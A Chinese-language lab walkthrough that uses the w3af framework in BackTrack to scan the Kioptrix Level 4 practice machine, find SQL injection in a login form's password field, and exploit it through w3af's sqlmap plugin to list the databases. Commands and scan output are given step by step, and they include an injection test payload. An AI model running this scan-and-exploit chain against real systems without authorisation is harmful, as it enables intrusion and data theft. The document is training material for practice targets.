w3af是一个Web应用程序攻击和检查框架.
该项目已超过130个插件,其中包括检查网站爬虫,SQL注入(SQL Injection),跨站(XSS),本地文件包含(LFI),远程文件包含(RFI)等.该项目的目标是要建立一个框架
以寻找和开发Web应用安全漏洞,所以很容易使用和扩展.
0×00 概述
在BackTrack5R3下使用w3af测试Kioptrix Level 4的SQL注入漏洞.
0×01 简介
w3af是一个Web应用程序攻击和检查框架.该项目已超过130个插件,其中包括检查网站爬虫,SQL注入(SQL Injection),跨站(XSS),本地文件包含(LFI),远程文件包含(RFI)等.
该项目的目标是要建立一个框架,以寻找和开发Web应用安全漏洞,所以很容易使用和扩展.
0×02 安装
[PHP] 纯文本查看 复制代码 root@bt:~# apt-get install w3af
0×03 启动
[PHP] 纯文本查看 复制代码 root@bt:~# cd /pentest/web/w3af/
root@bt:/pentest/web/w3af# ./w3af_console
0×04 漏洞扫描配置
[PHP] 纯文本查看 复制代码 w3af>>> plugins
//进入插件模块
w3af/plugins>>> list discovery
//列出所有用于发现的插件
w3af/plugins>>> discovery findBackdoor phpinfo webSpider
//启用findBackdoor phpinfo webSpider这三个插件
w3af/plugins>>> list audit
//列出所有用于漏洞的插件
w3af/plugins>>> audit blindSqli fileUpload osCommanding sqli xss
//启用blindSqli fileUpload osCommanding sqli xss这五个插件
w3af/plugins>>> back
//返回主模块
w3af>>> target
//进入配置目标的模块
w3af/config:target>>> set target [url]http://192.168.244.132/[/url]
//把目标设置为[url]http://192.168.244.132/[/url]
w3af/config:target>>> back
//返回主模块
0×05 漏洞扫描
[PHP] 纯文本查看 复制代码 w3af>>> start
---
New URL found by phpinfo plugin: [url]http://192.168.244.132/[/url]
New URL found by phpinfo plugin: [url]http://192.168.244.132/checklogin.php[/url]
New URL found by phpinfo plugin: [url]http://192.168.244.132/index.php[/url]
New URL found by webSpider plugin: [url]http://192.168.244.132/[/url]
New URL found by webSpider plugin: [url]http://192.168.244.132/checklogin.php[/url]
New URL found by webSpider plugin: [url]http://192.168.244.132/index.php[/url]
Found 3 URLs and 8 different points of injection.
The list of URLs is:
- [url]http://192.168.244.132/index.php[/url]
- [url]http://192.168.244.132/checklogin.php[/url]
- [url]http://192.168.244.132/[/url]
The list of fuzzable requests is:
- [url]http://192.168.244.132/[/url] | Method: GET
- [url]http://192.168.244.132/[/url] | Method: GET | Parameters: (mode="phpinfo")
- [url]http://192.168.244.132/[/url] | Method: GET | Parameters: (view="phpinfo")
- [url]http://192.168.244.132/checklogin.php[/url] | Method: GET
- [url]http://192.168.244.132/checklogin.php[/url] | Method: POST | Parameters: (myusername="", mypassword="")
- [url]http://192.168.244.132/index.php[/url] | Method: GET
- [url]http://192.168.244.132/index.php[/url] | Method: GET | Parameters: (mode="phpinfo")
- [url]http://192.168.244.132/index.php[/url] | Method: GET | Parameters: (view="phpinfo")
Blind SQL injection was found at: "http://192.168.244.132/checklogin.php", using HTTP method POST. The injectable parameter is: "mypassword". This vulnerability was found in the requests with ids 309 to 310.
A SQL error was found in the response supplied by the web application, the error is (only a fragment is shown): "supplied argument is not a valid MySQL". The error was found on response with id 989.
A SQL error was found in the response supplied by the web application, the error is (only a fragment is shown): "mysql_". The error was found on response with id 989.
SQL injection in a MySQL database was found at: "http://192.168.244.132/checklogin.php", using HTTP method POST. The sent post-data was: "myusername=John&Submit=Login&mypassword=d'z"0". The modified parameter was "mypassword". This vulnerability was found in the request with id 989.
Scan finished in 19 seconds.
---
//开始扫描
0×06 漏洞利用配置
[PHP] 纯文本查看 复制代码 w3af>>> exploit
//进入漏洞利用模块
w3af/exploit>>> list exploit
//列出所有用于漏洞利用的插件
w3af/exploit>>> exploit sqlmap
//使用sqlmap进行SQL注入漏洞的测试
[PHP] 纯文本查看 复制代码 ---
Trying to exploit using vulnerability with id: [1010, 1011]. Please wait...
Vulnerability successfully exploited. This is a list of available shells and proxies:
- [0] <sql object ( dbms: "MySQL >= 5.0.0" | ruser: "root@localhost" )>
Please use the interact command to interact with the shell objects.
---
//测试存在SQL注入漏洞
//这里要记住shell objects(这里是0),等一下要用到
0x07 漏洞利用
w3af/exploit>>> interact 0
//interact + shell object就可以利用了
---
Execute "exit" to get out of the remote shell. Commands typed in this menu will be run through the sqlmap shell
w3af/exploit/sqlmap-0>>>
---
//sqlmap的一个交互式模块
w3af/exploit/sqlmap-0>>> dbs
---
Available databases: [3]:
[*] information_schema
[*] members
[*] mysql
---
//成功获得数据库信息 |